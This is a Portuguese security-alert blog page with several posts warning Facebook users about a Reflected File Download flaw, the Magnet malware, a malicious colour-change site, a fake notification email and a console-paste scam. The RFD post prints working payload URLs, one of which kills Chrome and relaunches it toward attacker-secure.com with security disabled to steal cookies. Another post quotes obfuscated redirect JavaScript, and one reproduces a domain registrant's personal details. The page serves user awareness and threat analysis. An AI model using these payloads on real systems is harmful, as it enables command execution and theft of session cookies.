Todos os posts em Alerta FB

Facebook vulnerável a uma falha grave

facebook

A maior rede social do planeta está vulnerável a uma falha RFDReflected File Download – que permite a um utilizador malicioso obter controlo do sistema operativo da vítima. Com este tipo de vulnerabilidade, divulgada por Oren Hafif em Outubro de 2014, um utilizador pode enviar um link malicioso para um dominio confiável [neste caso o Facebook.com] e forçar um download nesse dominio confiável. Depois de executado, o utilizador malicioso pode executar qualquer comando do sistema operativo com o nível de permissão atual do utilizador [mais uma razão para que não navegue na web como administrador].

Mohamed Ramadan testou esta falha no Facebook e conseguiu replicar um RFD.
Os testes de demonstração da falha do Mohamed conseguem abrir a calculadora do Windows[1], o Paint[2] e num último exemplo, fechar o browser Chrome e reiniciá-lo com o modo segurança inativo para roubar os cookies do utilizador[3].

[1] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||calc||&format=json

[2] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||mspaint||&format=json

[3] https://api.facebook.com/method/Update.cmd?q=UpdateChrome%22;||taskkill /F /IM ch*|md||start chrome http://attacker-secure.com/ –disable-web-security –disable-popup-blocking||&format=json

fb-rfd-2

O autor desta descoberta testou todos estes exemplos no Windows 7 com o Internet Explorer 9, embora refira que também é possível executar com o Firefox, Chrome e Opera.

Fica aqui referência também ao vídeo que demonstra esta falha:

Pessoalmente experimentei com o IE8 e o IE11 e não foi possível executar o ataque. No entanto, com o IE9 no Windows Vista e Windows 7 correu o ataque sem problema.

Segundo a site do Mohamed, a resposta do Facebook a esta vulnerabilidade foi a seguinte:

Thanks for your report. This is a technique that has been reported before. It’s not fully fixable at present, at least for the general case, but we’re looking into ways to rectify it globally going forward. For now it’s a known risk and not eligible for a bug bounty reward. We do have mechanisms in place to monitor and mitigate abuse.

Isto é um grande risco de segurança para os todos utilizadores desta rede social. Fica a dica de verificarem sempre os links que vos enviam. Será uma questão de tempo até que utilizadores maliciosos comecem a usar este tipo de vulnerabilidade para propagar malware.

Magnet – um novo malware no Facebook

facebook

Um novo malware, descoberto por Mohammad Faghani e intitulado de Magnet, está a propagar-se pelo Facebook utilizando um suposto vídeo pornográfico e com mensagens apelativas. A ideia é que, os utilizadores desta rede social mais curiosos, cliquem no suposto vídeo.

Em apenas dois dias, este malware infetou mais de 100.000 utilizadores. Este número deverá aumentar nos próximos dias.

Ao clicar no link que acompanha o post de Facebook, assim que o utilizador começa a ver um vídeo, é reencaminhado para uma instalação de uma falsa atualização do Adobe Flash Player.
Já reparei que a imagem erótica que acompanha este conteúdo malicioso vai sendo modificada e por isso a minha recomendação é simplesmente não clicar nestes links.

Embora o Facebook tenha sistema automatizados para prevenir ligações maliciosos se propaguem pela rede, muitas conseguem ultrapassar este tipo de proteção e infetar milhares de utilizadores curiosos.

Instalei o malware num ambiente controlado e reparei que, após a instalação da suposta atualização do Flash [extensão para o browser], o Magnet partilha no Facebook o link malicioso e identifica 20 amigos na rede social. Também gosta de uma ligação duma página de Facebook e pelos vistos, já são bastantes os likes.

facebook_malware

O Magnet aparenta ter um um sistema keylogger [monitoriza rato e teclado] e aceita comandos C&C [command & control].

Faghani acrescenta que este malware atualiza-se automaticamente com novos padrões de ataque e bloqueia diversos tipos de proteção contra estas ameaças.

Uma nova variante deste malware, força a vítima também a seguir uma conta no Twitter.

Quem quiser acompanhar o desenvolvimento deste malware pode fazê-lo seguinte a sua assinatura MD5: https://malwr.com/analysis/ZDkyZWIwZGI4YjA2NGNiZjk4MDRlMmMzZmNjN2Y4YjA/.
Saliento que o pacote PT-pt está incluído neste malware, e como se pode ver no mapa, Portugal está entre os muito infetados com o Magnet.

fbmalheatmap

Relatório completo do Mohammad Faghani – http://www.faghani.info/report.txt

Malware colorproface.net circula no Facebook

colorproface

Um novo malware está a ser propagado no Facebook. A mensagem está a ser publicada em diversos grupos do Facebook e utilizadores infetados estão a tornar este malware viral.

A mensagem que transmite este malware é:

Olha que interessante essas novas cores pro facebook.
http://colorproface.net

O domínio colorproface.net foi registado no GoDaddy com a seguinte informação:

Creation Date: 2014-06-09 14:00:54
Registry Registrant ID:
Registrant Name: manusclecio albuquerque
Registrant Organization: hwuaye
Registrant Street: rua maria da penha 2379
Registrant City: Belem
Registrant State/Province: Para
Registrant Postal Code: 00000-000
Registrant Country: Brazil
Registrant Phone: +55.0
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: moahdogo@gmail.com

O site apresenta malware, o que significa que a própria visita poderá infectar o seu sistema.

script_malicioso

Basicamente este código javascript ofuscado, carrega um iframe para tentar o download de um ficheiro malicioso intitulado de coresparaseuface.exe.

Submeti a amostra ao VirusTotal e reparei na baixa taxa de deteção deste ficheiro. É bastante perigoso.

O malware, para além de realmente mudar as cores do Facebook, efetua alterações nocivas no registo do sistema operativo Windows.
Algumas pistas indicam ser um malware de origem brasileira, como já é habitual pelo idioma partilhado.

Fica o meu agradecimento ao nosso parceiro Miúdos Seguros na Net pela divulgação desta fraude.

Falsa notificação do Facebook leva a malware

Falsa notificação do Facebook leva a malware

Email que clona uma notificação do Facebook de novas mensagens encaminha para um site malicioso.

Assunto do email:

[Username], you have pending messages

Se a vítima clicar num dos dois botões que acompanham o email, este vai para o site:

ip_malicioso/~up1adstop/coldness.php

O código-fonte deste site (ofuscado):

bch1=”\x30″;yva2=”\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x6D\x65\x64
\x69\x63\x61\x72\x65\x73\x2E\x65\x75″;
setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F
\x6E\x2E\x68\x72\x65\x66\x3D\x79\x76
\x61\x32\x3B”,bch1);

… que depois de traduzido reencaminha para outro site malicioso:

setTimeout(“window.top.location.href=http://tabletmedicares.eu”, 0);

De referir que o primeiro url é detectado pelos antivirus online  com uma taxa de 7/51 e que o alojamento web deste url é utilizado por diversos sites de phishing.

No segundo url, encontrei dois tipos de malware. Um que rouba a password do Facebook, instalando um plugin no browser, e outro que instala adware no sistema operativo.
Em ambos os casos, os antivirus mais comuns detectam e bloqueiam estes conteúdos maliciosos.

Se por acaso clicou num destes endereços, deverá verificar a presença de malware no seu sistema.

Esquema fraudulento promete roubar senha do Facebook

hack_conta_facebook

Hoje está a circular em larga escala no Facebook um esquema fraudulento que informa aos utilizadores desta rede social que é possível roubar a contra-senha de qualquer utilizador do Facebook.

A página web – golelite.com/2014/02/revelador-de-contrasenas-facebook.html – promete hackar qualquer conta do Facebook apenas sabendo o perfil. De seguida, informa o utilizador que tem de executar 6 passos. Entre eles, cito:

1º Copia um determinado código
2º Ir para o perfil do Facebook que quer roubar
3º Entrar no Inspector do Google e pressionar F12
4º Colocar na secção da consola do Chrome
5º Colar o código que copiou no passo 1º
6º Pressionar Enter

hack_facebook_3

Basicamente, informa ao utilizador para colocar código Javascript num editor e executa esse mesmo código.
Neste caso, ao invés de roubar senha de qualquer utilizador do Facebook, este vai percorrer a lista de amigos da conta pessoal e identificá-los num comentário de um post para este esquema. Esta operação torna o post viral (à data deste artigo, o post do Facebook deste esquema já tinha mais de 130.000 comentários).

hack_conta_facebook2

O código malicioso está escrito em Javascript, e está ofuscado, embora tenha encontrado no Pastebin uma versão que pode ser lida de maneira a poder entender um pouco o que faz.

A falha não está propriamente no Facebook mas sim na mentalidade do utilizador que, por falta de atenção/informação, executa o próprio comando que o infecta.

Embora tenha sido escrito e propagado apenas em língua espanhola, são muitos os portugueses que estão a cair nesta fraude.

É importante divulgar esta informação para que o número de vítimas não aumente.